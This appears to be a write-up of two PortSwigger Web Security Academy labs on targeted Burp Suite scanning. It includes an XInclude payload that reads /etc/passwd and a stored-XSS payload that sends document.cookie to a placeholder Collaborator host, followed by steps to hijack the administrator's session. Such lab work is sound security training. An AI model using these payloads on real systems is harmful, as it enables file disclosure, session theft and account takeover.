Labs Covered
This write-up focuses on the following PRACTITIONER-level labs from the PortSwigger Web Security Academy related to Essential Skills:
Discovering vulnerabilities quickly with targeted scanning
This lab demonstrates how to use targeted scanning techniques to identify vulnerabilities more efficiently by focusing on likely problem areas.
Scanning non-standard data structures
This lab shows how to identify and scan non-standard or complex data structures that may not be handled effectively by typical scanning tools.
LAB 1 - Discovering vulnerabilities quickly with targeted scanning
Lab Description
Solution
1. Identifying a Suspicious URL
- Start by browsing the application and identifying any URL or feature that might be parsing XML or making server-side HTTP requests.
- In this lab, you notice
/product/stockas a vulnerable target.
2. Run Active Scan
- Send the scan the request to Burp Scanner.
- After the active scan completes, Burp identifies an Out-of-Band Resource Load on this endpoint, indicating it may be vulnerable to XXE or XInclude-based file inclusion.
3. Analyzing the Scanner Finding
- The scanner reports that it’s possible to induce the application to load external resources, which hints at insecure XML parsing or XInclude being enabled on the server.
4. Send Request to Repeater
- Forward the same request (from the scanner or proxy) to Burp Repeater for manual testing.
- Observe the body parameters — the
productIdparameter is typically the XML input field to focus on.
5. Injecting Malicious Payload
- Modify the
productIdXML input with an XInclude payload to try accessing sensitive files, like/etc/passwd.
Payload:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
6. Analyze the Response
- Send the modified request.
- If the server is vulnerable and XInclude is enabled, the server will parse the injected file and return its contents in the HTTP response.
- You should now see the contents of
/etc/passwdin the response body.
Lab Solved
You’ve confirmed that the application is vulnerable to XInclude-based file inclusion, and you were able to read arbitrary files from the server using a crafted XML payload.
LAB 2 - Scanning non-standard data structures
Lab Description
Solution
1. Install Required Extensions
- Install any necessary browser or Burp Suite extensions to assist with testing and decoding (e.g., “HackTools” for payloads or “JSON Viewer”).
2. Login as Wiener
- Login with the wiener user credentials provided in the lab.
3. Send Authenticated Request to Repeater
- After logging in, intercept any request (e.g., to the account page) and send it to Burp Repeater.
- This allows you to examine and manipulate the request more easily.
4. Decode the Session Cookie
- Decode the session cookie using Base64 decoding or JWT decoder, depending on the format.
- You’ll likely see structured content with identifiable parameter names.
5. Manual Fuzzing
- Try manually inserting payloads into visible fields like profile bio, username, or other form inputs.
- In this case, you didn’t find any XSS reflected manually, so you try another method.
6. Send to Intruder
- Send the profile update request to Burp Intruder.
- Use cluster bomb or pitchfork mode with common XSS payloads to find possible injection points.
7. Scan for XSS Insertion Point
- Begin active scanning or custom payload injection using Intruder.
- After analyzing responses, you discover that one parameter reflects content back — a stored XSS vulnerability is identified.
Doing Insertion point scan
We have find Cross-site scripting store of insertion point
8. Craft XSS Payload
- Send a basic XSS payload to Repeater to verify reflection and triggering:
- Once verified, move to building a data exfiltration payload.
Decoded payload
9. Create Payload for Collaborator
-
Craft an XSS payload to steal the session cookie using Burp Collaborator:
"><svg/onload=fetch(`//YOUR-COLLABORATOR-ID.burpcollaborator.net?cookie=${encodeURIComponent(document.cookie)}`)> -
Replace
YOUR-COLLABORATOR-IDwith your actual Burp Collaborator payload URL.
10. Submit Payload and Wait
- Submit the above payload in the vulnerable parameter (e.g., bio, message, comment).
- Wait for the administrator to view the page, triggering the XSS and sending their cookie to your Burp Collaborator.
11. Capture Administrator’s Cookie
- In Burp Collaborator client, monitor the DNS or HTTP log.
- You should see a request containing the administrator’s session cookie.
12. Decode Administrator’s Cookie
- Copy the stolen cookie value and decode it (if encoded) to inspect its contents.
- This verifies you got the right session.
13. Impersonate Administrator
- Take the administrator’s session cookie (only the value before the first semicolon).
- Replace wiener’s session cookie with this one using Burp or browser dev tools.
- URL-encode the value and paste it in the
Cookieheader.
14. Reload and Delete Carlos
- Reload the page.
- You should now be logged in as the administrator.
- Go to the admin panel, find Carlos, and delete his account.